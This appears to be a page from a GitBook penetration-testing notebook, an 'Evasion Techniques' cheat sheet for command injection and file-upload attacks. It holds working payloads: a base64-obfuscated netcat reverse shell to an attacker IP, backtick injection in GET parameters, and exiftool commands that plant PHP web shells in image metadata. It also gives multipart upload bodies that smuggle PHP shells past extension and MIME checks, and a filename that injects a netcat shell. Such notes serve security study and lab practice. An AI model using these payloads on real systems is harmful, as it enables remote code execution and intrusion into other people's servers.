Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page

Was this helpful?

  1. Tools / Techniques

Evasion Techniques

Evasion

If "cat" command is not available on the box, try the following.

c"a"t
ca``t
ca\t    
$(id)
;cat
||cat
&& cat
|`echo "bmMgMTAuMTAuMTAuMTAgNTMgLWUgL2Jpbi9iYXNo" | base64 -d`   
    bmMgMTAuMTAuMTAuMTAgNTMgLWUgL2Jpbi9iYXNo: nc 10.10.10.10 53 -e /bin/bash

GET parameter

# Place between ` ` 
http://IP:PORT/something?parameter=`ls`        
http://IP:PORT/something?parameter=`whoami`

Exiftool

Download an image and then:
1) exiftool -DocumentName="<?php echo '<h1>Something</h1>'; if(isset(\$_REQUEST['cmd'])) {echo '<pre>'; \$cmd=\$_REQUEST['cmd']; system(\$cmd); echo '</pre>'; } _halt_compiler(); ?>" index.jpg
or
2) exiftool -Comment="<?php passthru(\$_GET'cmd'); _halt_compiler();" index.jpg

Using BurpSuite

Content-Disposition: form-data; name="image"; filename="shell.php5"

Content-Type: application/x-php


<?php system($_GET['cmd']); ?>

======================================================================
Content-Disposition: form-data; name="image"; filename="shell.jpg.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>

======================================================================
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: image/jpeg

<?php system($_GET['cmd']); ?>

Name Injection

 touch ';nc my_ip_address 1337 -c bash'

Unrestricted File Upload

File Filtering Upload

Extension Validation
File Type Filtering
    - MIME
    - Magic Number    https://en.wikipedia.org/wiki/List_of_file_signatures 
File Length Filtering
File Name Filtering
File Content Filtering

Link

PreviousSteganographyNextSQL Injection Payloads

Last updated 3 years ago

Was this helpful?

PHP Type Juggling and Authentication Bypass
Unrestricted File Upload | OWASP Foundation
Logo